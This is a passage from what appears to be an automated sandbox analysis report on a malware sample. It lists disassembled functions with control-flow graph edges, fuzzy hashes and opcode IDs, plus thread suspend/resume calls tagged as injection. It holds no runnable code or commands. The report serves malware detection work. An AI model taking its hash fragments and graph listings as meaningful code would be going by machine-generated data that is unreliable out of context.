                                                                • Instruction Fuzzy Hash: A7A1ED7191DA8A8FE789EB68C8583BABFF2FB95350F00017AD009D72D2CB791855CB51
                                                                Function 00007FF8496309A8 Relevance: 3.1, Strings: 2, Instructions: 637COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 7ff8496309a8-7ff8496309aa 1 7ff8496309ac-7ff8496309f1 0->1 2 7ff8496309f5-7ff849630a8a 0->2 1->2 11 7ff849630a8c-7ff849630aca 2->11 12 7ff849630ad5-7ff849630aea 2->12 32 7ff849630b15-7ff849630b1a 11->32 39 7ff849630acc-7ff849630b0e 11->39 20 7ff849630aec-7ff849630b0e 12->20 21 7ff849630b35-7ff849630b64 12->21 20->32 34 7ff849630b65-7ff849630bda 21->34 33 7ff849630b1c-7ff849630b2e 32->33 32->34 33->21 56 7ff849630bdc-7ff849630c1a 34->56 57 7ff849630c25-7ff849630c64 34->57 39->32 70 7ff849630c1c-7ff849630c24 56->70 71 7ff849630c65-7ff849630d28 56->71 57->71 70->57 90 7ff849630d2a-7ff849630d5e 71->90 91 7ff849630d65-7ff849630d8a 71->91 90->91 98 7ff849630d8c-7ff849630dd1 91->98 99 7ff849630dd5-7ff849630dda 91->99 109 7ff849630e09-7ff849630e12 98->109 101 7ff849630ddc-7ff849630ddf 99->101 102 7ff849630e25-7ff849630e3a 99->102 101->109 117 7ff849630e3c-7ff849630e41 102->117 118 7ff849630e85-7ff849630e93 102->118 114 7ff849630e5d-7ff849630e68 109->114 115 7ff849630e14-7ff849630e22 109->115 125 7ff849639a10-7ff849639a46 114->125 121 7ff849630e6d-7ff849630e77 115->121 122 7ff849630e24 115->122 131 7ff849630e79-7ff849630e7e 117->131 132 7ff849630e43-7ff849630e4a 117->132 126 7ff849630e95-7ff849630ea4 118->126 121->131 122->102 141 7ff849639a47 125->141 138 7ff849630ea5-7ff849630eca 126->138 131->118 132->126 135 7ff849630e4c-7ff849630e5a 132->135 135->138 139 7ff849630e5c 135->139 144 7ff849630ecc-7ff849630f09 138->144 145 7ff849630f15-7ff849630f2a 138->145 139->114 141->141 153 7ff849630f81-7ff849630f91 144->153 147 7ff849630f2c-7ff849630f9f 145->147 148 7ff849630f75-7ff849630f7a 145->148 160 7ff849630fa1-7ff849630fa5 call 7ff84962c180 147->160 149 7ff849630fac-7ff849630fc3 148->149 154 7ff849630fc9-7ff849630fcd 149->154 154->125 156 7ff849630f7c 154->156 156->153 162 7ff849630faa 160->162 162->148
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8^cI$`6wI
                                                                • API String ID: 0-3787090860
                                                                • Opcode ID: 72dbddf13ab8b05087d58e8f418e316f058a746ad29c3b4bfa6caeb068645af4
                                                                • Instruction ID: 39515908bedff7f0882cf1507daf57decd0618dd3538d39fa522fa5e65dd294b
                                                                • Opcode Fuzzy Hash: 72dbddf13ab8b05087d58e8f418e316f058a746ad29c3b4bfa6caeb068645af4
                                                                • Instruction Fuzzy Hash: 54224632C1F6D69FE375BF68A8650F67FA0EF12698B0801B7D08C8E093DE1D64498359
                                                                Function 00007FF84962C784 Relevance: 2.8, Strings: 2, Instructions: 313COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PlI$\^H
                                                                • API String ID: 0-1564205966
                                                                • Opcode ID: 53130bdd9b3784fd905374dcf9c7753befc024f7b7394b5dfd2c5539c9e2106e
                                                                • Instruction ID: ae0fdaa79e11fd27efcb8a767054802b0b8bb74d0cdb2f44a421d71a1b5ec04c
                                                                • Opcode Fuzzy Hash: 53130bdd9b3784fd905374dcf9c7753befc024f7b7394b5dfd2c5539c9e2106e
                                                                • Instruction Fuzzy Hash: 81A1A035E0DA8A8FE7A5FF2888646B87BE1FF55341F5941FAC00DCB192DE2C98098751
                                                                Function 00007FF84962E542 Relevance: 1.8, Strings: 1, Instructions: 560COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 232 7ff84962e542-7ff84962e549 233 7ff84962e54f-7ff84962e581 call 7ff84962e2e0 call 7ff84962e1b0 232->233 234 7ff84962e765-7ff84962e776 232->234 233->234 241 7ff84962e587-7ff84962e5d9 call 7ff84962e2e0 call 7ff84962e1b0 233->241 235 7ff84962e778 234->235 236 7ff84962e77d-7ff84962e788 234->236 235->236 241->234 248 7ff84962e5df-7ff84962e624 call 7ff84962e2e0 241->248 254 7ff84962e626-7ff84962e63a call 7ff84962e1b0 248->254 255 7ff84962e694-7ff84962e6d0 call 7ff8496299f0 248->255 254->234 260 7ff84962e640-7ff84962e663 call 7ff84962e2e0 254->260 265 7ff84962e709-7ff84962e710 call 7ff849628a20 255->265 266 7ff84962e669-7ff84962e679 260->266 267 7ff84962e835-7ff84962e84c 260->267 271 7ff84962e715-7ff84962e71a 265->271 266->267 269 7ff84962e67f-7ff84962e692 266->269 272 7ff84962e84e 267->272 273 7ff84962e84f-7ff84962e85d 267->273 269->254 269->255 274 7ff84962e71c-7ff84962e71e 271->274 275 7ff84962e6d2-7ff84962e6f2 271->275 272->273 277 7ff84962e85f 273->277 278 7ff84962e865 273->278 274->234 279 7ff84962e720-7ff84962e723 274->279 275->267 276 7ff84962e6f8-7ff84962e703 275->276 276->265 280 7ff84962e7eb-7ff84962e7ff 276->280 277->278 281 7ff84962e869-7ff84962e87a 278->281 282 7ff84962e867 278->282 283 7ff84962e729-7ff84962e744 279->283 284 7ff84962e725 279->284 288 7ff84962e801 280->288 289 7ff84962e806-7ff84962e811 280->289 286 7ff84962e87c-7ff84962e8a8 281->286 287 7ff84962e8c5-7ff84962e8cf 281->287 282->281 285 7ff84962e8a9 282->285 283->267 290 7ff84962e74a-7ff84962e763 call 7ff84962e1b0 283->290 284->283 292 7ff84962e8aa-7ff84962eaea 285->292 286->285 286->292 294 7ff84962eaef-7ff84962eaf2 287->294 295 7ff84962e8d5-7ff84962e8da 287->295 288->289 290->234 303 7ff84962e789-7ff84962e7a2 call 7ff84962e2e0 290->303 296 7ff84962eaf3-7ff84962eaf5 294->296 297 7ff84962e8e0-7ff84962eb29 295->297 298 7ff84962e9e6 295->298 301 7ff84962ea0f-7ff84962ea16 298->301 306 7ff84962e9e8-7ff84962ea01 301->306 307 7ff84962ea18-7ff84962ea33 call 7ff8496299f0 301->307 303->267 313 7ff84962e7a8-7ff84962e7af 303->313 311 7ff84962ea07-7ff84962ea0c 306->311 312 7ff84962eb75-7ff84962eb85 306->312 316 7ff84962ea38-7ff84962ea63 307->316 311->301 320 7ff84962eb88-7ff84962eb9a 312->320 321 7ff84962eb87 312->321 315 7ff84962e7d9-7ff84962e7e1 313->315 318 7ff84962e7e3-7ff84962e7e9 315->318 319 7ff84962e7b1-7ff84962e7cd 315->319 336 7ff84962ea8c-7ff84962ea92 316->336 318->280 323 7ff84962e812 318->323 319->267 322 7ff84962e7cf-7ff84962e7d7 319->322 325 7ff84962eb9c-7ff84962ebd6 320->325 326 7ff84962ebe5-7ff84962ec3b 320->326 321->320 322->315 323->267 345 7ff84962ebd7 325->345 332 7ff84962ec40-7ff84962ec47 326->332 332->332 334 7ff84962ec49-7ff84962efd6 332->334 339 7ff84962ea99-7ff84962ea9f 336->339 340 7ff84962eaa1-7ff84962eaa6 339->340 341 7ff84962ea65-7ff84962ea7e 339->341 342 7ff84962eaac-7ff84962eab7 340->342 343 7ff84962e993 340->343 341->312 344 7ff84962ea84-7ff84962ea89 341->344 342->296 349 7ff84962eab9-7ff84962eae1 call 7ff8496299f0 342->349 347 7ff84962e9c1-7ff84962e9d8 343->347 344->336 345->345 347->339 348 7ff84962e9de-7ff84962e9e4 347->348 348->298 350 7ff84962e995 348->350 350->347 352 7ff84962eb68-7ff84962eb6d 350->352 352->312
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                • Opcode ID: 0796430b9ab4ff3f047f93068b0a4a9c5b5b6ff2fb054c8e075d73d38671018c
                                                                • Instruction ID: 595cde83a5508cb3cdbea9fce804ac85b9820edc9f20911df9b9d5aca109ddb7
                                                                • Opcode Fuzzy Hash: 0796430b9ab4ff3f047f93068b0a4a9c5b5b6ff2fb054c8e075d73d38671018c
                                                                • Instruction Fuzzy Hash: 5012B530D0DA8A9FE76AFF64C4586B9BBA0FF55340F1441BAD04EC7682DB38A841CB51
                                                                Function 00007FF84962FCC2 Relevance: 1.8, Strings: 1, Instructions: 505COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 355 7ff84962fcc2-7ff84962fcc4 357 7ff84962fd0e-7ff84962fd30 355->357 358 7ff84962fcc6-7ff84962fea5 355->358 362 7ff84962feaa-7ff84962fec5 357->362 363 7ff84962fd36-7ff84962fd4b 357->363 370 7ff84962fecd 362->370 371 7ff84962fec7 362->371 363->362 364 7ff84962fd51-7ff84962fd5d 363->364 365 7ff84962fd8e-7ff84962fda4 call 7ff84962f6a0 364->365 366 7ff84962fd5f-7ff84962fd76 call 7ff84962e1b0 364->366 379 7ff84962fe03-7ff84962fe14 365->379 380 7ff84962fda6-7ff84962fdb1 365->380 378 7ff84962fd7c-7ff84962fd8b call 7ff84962e2e0 366->378 366->379 374 7ff84962fecf 370->374 375 7ff84962fed1-7ff84962feda 370->375 371->370 374->375 381 7ff84962ff11-7ff84962ff13 374->381 376 7ff84962fedc-7ff84962ff33 375->376 377 7ff84962ff25-7ff84962ff30 375->377 409 7ff84962fefb-7ff84962ff37 376->409 410 7ff84962ff3e-7ff84962ff5c 376->410 378->365 383 7ff84962fe1b-7ff84962fe26 379->383 384 7ff84962fe16 379->384 380->362 388 7ff84962fdb7-7ff84962fdcc 380->388 386 7ff84962ff5e-7ff84962ff7a 381->386 387 7ff84962ff15-7ff84962ff21 381->387 384->383 398 7ff84962ff7c-7ff84962ff90 386->398 399 7ff84962ffc5-7ff84962ffd0 386->399 387->377 388->362 391 7ff84962fdd2-7ff84962fde5 388->391 394 7ff84962fe39-7ff84962fe44 call 7ff8496280d8 391->394 395 7ff84962fde7-7ff84962fe01 call 7ff84962e1b0 391->395 403 7ff84962fe49-7ff84962fe4c 394->403 395->379 407 7ff84962fe27-7ff84962fe36 call 7ff84962e2e0 395->407 412 7ff849630078-7ff84963007d 398->412 401 7ff84963005d-7ff849630075 399->401 402 7ff84962ffd6-7ff84962ffd9 399->402 401->412 402->401 408 7ff84962ffdf-7ff84962ffe2 402->408 411 7ff84962fe53-7ff84962fe5b 403->411 407->394 416 7ff84963004b-7ff849630052 408->416 417 7ff84962ffe4-7ff849630011 408->417 409->381 419 7ff84962fc9a-7ff84962fca7 411->419 420 7ff84962fe61-7ff84962fe75 411->420 438 7ff84962ffac-7ff849630087 412->438 439 7ff849630091-7ff8496300af 412->439 427 7ff849630012-7ff84963002c 416->427 428 7ff849630054-7ff84963005c 416->428 419->411 424 7ff84962fcad-7ff84962fcc1 419->424 425 7ff84962fe7c-7ff84962fe87 420->425 426 7ff84962fe77 420->426 424->355 426->425 432 7ff849630032-7ff84963003d 427->432 433 7ff8496300b1-7ff8496300da 427->433 432->433 437 7ff84963003f-7ff849630049 432->437 448 7ff8496300dc-7ff849630101 call 7ff84962ac70 433->448 449 7ff849630125-7ff8496301ce 433->449 437->416 438->399 470 7ff849630190-7ff849630193 call 7ff8496301d5 449->470 471 7ff849630166-7ff8496301af call 7ff8496301d5 449->471 474 7ff849630198 470->474 476 7ff8496301d0-7ff8496301d3 474->476 478 7ff84963019a call 7ff849627260 476->478 483 7ff84963019f-7ff8496301a5 478->483
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: HtbI
                                                                • API String ID: 0-1960288083
                                                                • Opcode ID: f9b1906a07a7abb42a4b3ee2cf5a27a77149a047dff15f56fddea93176200bba
                                                                • Instruction ID: 3b176b10d212e2f225731a68722e6a78ef2c0ceb85083f1356d1eac35395d5b5
                                                                • Opcode Fuzzy Hash: f9b1906a07a7abb42a4b3ee2cf5a27a77149a047dff15f56fddea93176200bba
                                                                • Instruction Fuzzy Hash: A802EF30A5DA8A8FE379FF28D4905B977E1FF45380B54057EC48EC7682DB29B8468B41
                                                                Function 00007FF8490CEA60 Relevance: 1.7, APIs: 1, Instructions: 162threadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 484 7ff8490cea60-7ff8490cea99 486 7ff8490cea9c-7ff8490ceb72 ResumeThread 484->486 487 7ff8490cea9b 484->487 491 7ff8490ceb74 486->491 492 7ff8490ceb7a-7ff8490cebc4 486->492 487->486 491->492
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2141556603.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff8490c0000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID:
                                                                • API String ID: 947044025-0
                                                                • Opcode ID: 4440b9fca93dee43d99ac15c0c72a1c9c9925ebd855cd9a46a8c6b54a6b86ce4
                                                                • Instruction ID: 9a065a1edecfa713ab018a3b6cdac50479818929f73790221a6d4d3baacc9a6f
                                                                • Opcode Fuzzy Hash: 4440b9fca93dee43d99ac15c0c72a1c9c9925ebd855cd9a46a8c6b54a6b86ce4
                                                                • Instruction Fuzzy Hash: 37517C7090D78C8FDB59DFA8C858AE9BFF0EF56310F0441ABD049D7252CA79A846CB11
                                                                Function 00007FF8490CD1FD Relevance: 1.6, APIs: 1, Instructions: 139threadinjectionCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 495 7ff8490cd1fd-7ff8490cd209 496 7ff8490cd214-7ff8490cd2e2 SuspendThread 495->496 497 7ff8490cd20b-7ff8490cd213 495->497 501 7ff8490cd2e4 496->501 502 7ff8490cd2ea-7ff8490cd334 496->502 497->496 501->502
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2141556603.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff8490c0000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID: SuspendThread
                                                                • String ID:
                                                                • API String ID: 3178671153-0
                                                                • Opcode ID: b3a00483c1683e00a38fb35b0e2b9fc5e68c7d5b6559266c763a14c23809b6fc
                                                                • Instruction ID: b5f0e6ce96a49fd185eb0a6ed9b4aeaddb4db48d7cac1a813b1624ce9d70519b
                                                                • Opcode Fuzzy Hash: b3a00483c1683e00a38fb35b0e2b9fc5e68c7d5b6559266c763a14c23809b6fc
                                                                • Instruction Fuzzy Hash: 18412A70D0864D8FDB58DF98D885AADBBF0FB5A310F10416AD049E7252DB74A885CB45
                                                                Function 00007FF8490D0915 Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 505 7ff8490d0915-7ff8490d09f3 GetFileAttributesW 509 7ff8490d09f5 505->509 510 7ff8490d09fb-7ff8490d0a39 505->510 509->510
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2141556603.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff8490c0000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: a70208a3f6885741f54831d46b35889b8bb970050a5aa909cd03cc49e2bd0c3e
                                                                • Instruction ID: df51b25a5382804e78af61bb34bdf9f71a3e5f161967c29ff04a1f010c1be989
                                                                • Opcode Fuzzy Hash: a70208a3f6885741f54831d46b35889b8bb970050a5aa909cd03cc49e2bd0c3e
                                                                • Instruction Fuzzy Hash: 0541197090865C8FDB98EF98D889BEDBBF0FB59310F10416ED04DE7252DA74A885CB54
                                                                Function 00007FF84962C399 Relevance: 1.5, Strings: 1, Instructions: 224COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: H{uI
                                                                • API String ID: 0-2047368440
                                                                • Opcode ID: a900dd1b1b4eacf348088065a5e9f488ab464a9f823bf8f04f8046ddc01ea657
                                                                • Instruction ID: aca9bdcda506797031f4dccefc9d7e09a5302bfc976d3391934ff4369ad2d015
                                                                • Opcode Fuzzy Hash: a900dd1b1b4eacf348088065a5e9f488ab464a9f823bf8f04f8046ddc01ea657
                                                                • Instruction Fuzzy Hash: 08713371C1DA8E9FE760FF68D8466FEBBB0FF45390F1401BAD149D7192EA2868458780
                                                                Function 00007FF84962064B Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 552 7ff84962064b-7ff849620653 553 7ff8496205ed-7ff849620619 552->553 554 7ff849620655-7ff84962065c 552->554 562 7ff849620621 553->562 556 7ff84962065e-7ff849620663 554->556 558 7ff8496206d2-7ff849620781 556->558 559 7ff849620665-7ff849620698 556->559 571 7ff84962079a-7ff8496207d3 558->571 572 7ff8496206f4-7ff849620795 558->572 559->558 578 7ff84962081d 571->578 579 7ff8496207d5-7ff84962082e 571->579 572->558 584 7ff849620720-7ff849620724 572->584 581 7ff84962081e-7ff849620eab 578->581 579->581 584->556 586 7ff84962072a-7ff84962072f 584->586 586->558 588 7ff849620731-7ff849620737 586->588
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: X;`I
                                                                • API String ID: 0-1832804531
                                                                • Opcode ID: 7f521cb70fdf6a49dccff45971314c773e7616ba2fa65488b5e0b1a248004029
                                                                • Instruction ID: fb1909f3df0ec6ac21aa73503605ed38a4c0cb397d0ba298ec3c9473e7f9dc05
                                                                • Opcode Fuzzy Hash: 7f521cb70fdf6a49dccff45971314c773e7616ba2fa65488b5e0b1a248004029
                                                                • Instruction Fuzzy Hash: E161D130D1D68E9FEB69FF2488546BDBBA1FF55380F1404BAD00ED7182EE296841CB41
                                                                Function 00007FF8496228E8 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 594 7ff8496228e8-7ff849622900 596 7ff849622908-7ff849622933 594->596 600 7ff84962295c-7ff849622962 596->600 601 7ff849622969-7ff84962296f 600->601 602 7ff849622971-7ff849622976 601->602 603 7ff849622935-7ff84962294e 601->603 604 7ff84962297c-7ff8496229b1 602->604 605 7ff849622863-7ff8496228a8 602->605 606 7ff849622a45-7ff849622a55 603->606 607 7ff849622954-7ff849622959 603->607 605->601 611 7ff8496228ae-7ff8496228b4 605->611 613 7ff849622a58-7ff849622aa6 606->613 614 7ff849622a57 606->614 607->600 615 7ff849622865-7ff849622a3d 611->615 616 7ff8496228b6 611->616 614->613 615->606 619 7ff8496228df-7ff8496228e6 616->619 619->594 620 7ff8496228b8-7ff8496228d1 619->620 620->606 623 7ff8496228d7-7ff8496228dc 620->623 623->619
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                • Opcode ID: 3b4a64943fa346a410aef95441ac659868d7eb1470dbb6405ee303be189eebfe
                                                                • Instruction ID: 0a967a2b3c9e59bf814d61c06bc886d737ffd22ed6074a0da63119c4ec4105e5
                                                                • Opcode Fuzzy Hash: 3b4a64943fa346a410aef95441ac659868d7eb1470dbb6405ee303be189eebfe
                                                                • Instruction Fuzzy Hash: 21514D30D0C68A9FDB6DEFA8D4A55BDB7B1FF58340F1044BAC00AE7286DA386945CB51
                                                                Function 00007FF8490CEBC9 Relevance: 1.4, APIs: 1, Instructions: 148COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 626 7ff8490cebc9-7ff8490cebd5 627 7ff8490cebd7-7ff8490cebdf 626->627 628 7ff8490cebe0-7ff8490cebe9 626->628 627->628 629 7ff8490cec24-7ff8490cecb2 CloseHandle 628->629 630 7ff8490cebeb-7ff8490cec23 628->630 634 7ff8490cecb4 629->634 635 7ff8490cecba-7ff8490ced0e 629->635 630->629 634->635
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2141556603.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff8490c0000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID: CloseHandle
                                                                • String ID:
                                                                • API String ID: 2962429428-0
                                                                • Opcode ID: 1cdbbf0d9ab732c929d636e5620bec61523cf803b43734b845f96d6bdf660152
                                                                • Instruction ID: 0c5d71e2dc556598a4b87e1a1802be80e483f2034affb7f84c184be1f74dbb2c
                                                                • Opcode Fuzzy Hash: 1cdbbf0d9ab732c929d636e5620bec61523cf803b43734b845f96d6bdf660152
                                                                • Instruction Fuzzy Hash: 7A416C70D0865C8FDB58DFA8D889BEDBBF0FB56311F1041AAD049E7292DA34A885CB01
                                                                Function 00007FF84962E99A Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                • Opcode ID: 4c6c6ac209d645b775a09116c1cf51067a67a5e5882fa23dccfb607fc463f5e1
                                                                • Instruction ID: 605b4fb07f746db2584d4b007f15c475c0d62d72897e0a81f6c05bac3261c9a4
                                                                • Opcode Fuzzy Hash: 4c6c6ac209d645b775a09116c1cf51067a67a5e5882fa23dccfb607fc463f5e1
                                                                • Instruction Fuzzy Hash: 2D416D30D0D59A9FEB6AEFA8C4595FDBBB1FF54341F0441BAC00AE7292CA386945CB50
                                                                Function 00007FF84962C3E3 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: H{uI
                                                                • API String ID: 0-2047368440
                                                                • Opcode ID: 16dbe25b73669ed9c15c822f58dad814b78c47f5e0a9e049dec7235e255918d2
                                                                • Instruction ID: 61b0fc83921d7b636563879084dc64088ff656d16755a7a84d7dbd5110925497
                                                                • Opcode Fuzzy Hash: 16dbe25b73669ed9c15c822f58dad814b78c47f5e0a9e049dec7235e255918d2
                                                                • Instruction Fuzzy Hash: 2C316D75D1C88A9EEBA4FF58D4855BEBBB1FF58390F6004B9D10EE3295EE2C68418740
                                                                Function 00007FF84962C428 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: H{uI
                                                                • API String ID: 0-2047368440
                                                                • Opcode ID: 9d147a23cdcac1e81015edef74805acb8c9b5eeca3a2c16e5a57334e9f236588
                                                                • Instruction ID: ed19383185eecfaba2fcd19abf6d47d455a2667b0a3e3afe79297b6c6149512b
                                                                • Opcode Fuzzy Hash: 9d147a23cdcac1e81015edef74805acb8c9b5eeca3a2c16e5a57334e9f236588
                                                                • Instruction Fuzzy Hash: 2F317E75D1C88E9EEBA4FF58D8515FEBBB1FF58390F500075D10AE2285EE3868418780
                                                                Function 00007FF848F21E9C Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 741 7ff848f21e9c-7ff848f21ec4 call 7ff848f20c50 744 7ff848f21ec9 741->744
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2139918697.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f20000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0
                                                                • API String ID: 0-4108050209
                                                                • Opcode ID: 7fb4b35590497374325cbb6f81ffce274f945e3e5910123ebfc3c25faf97e62f
                                                                • Instruction ID: cb5d5decd1d2728c7d7ca97a7a9fba5a222378929bd5ce0233d82e4476fb25d4
                                                                • Opcode Fuzzy Hash: 7fb4b35590497374325cbb6f81ffce274f945e3e5910123ebfc3c25faf97e62f
                                                                • Instruction Fuzzy Hash: EEE08C30C4842F8ADB64EB60CC447F9B2A0EF80300F0181FB802FE2080CF352A809A01
                                                                Function 00007FF84962AD10 Relevance: .7, Instructions: 689COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f454833c97c235f136fba5e56a412b907787529f801d298f16eed51fe215926f
                                                                • Instruction ID: b01f436c0f684c38310a9956c00c7695947091664d8f6bbfc0354c678a0a4861
                                                                • Opcode Fuzzy Hash: f454833c97c235f136fba5e56a412b907787529f801d298f16eed51fe215926f
                                                                • Instruction Fuzzy Hash: AD32B530A1CA598FDBA8FF18C899AB973E2FF55350F5441B9D01EC7292DE24AC45CB81
                                                                Function 00007FF849622B5F Relevance: .4, Instructions: 414COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d8e7be1336251933064278ad184c409634f90f44b2e0d1ecec37b7f60ed1af7f
                                                                • Instruction ID: 5e6c406506c843697666a611d237f4e18b5a2d67e3bae26519c28a65552ea8c4
                                                                • Opcode Fuzzy Hash: d8e7be1336251933064278ad184c409634f90f44b2e0d1ecec37b7f60ed1af7f
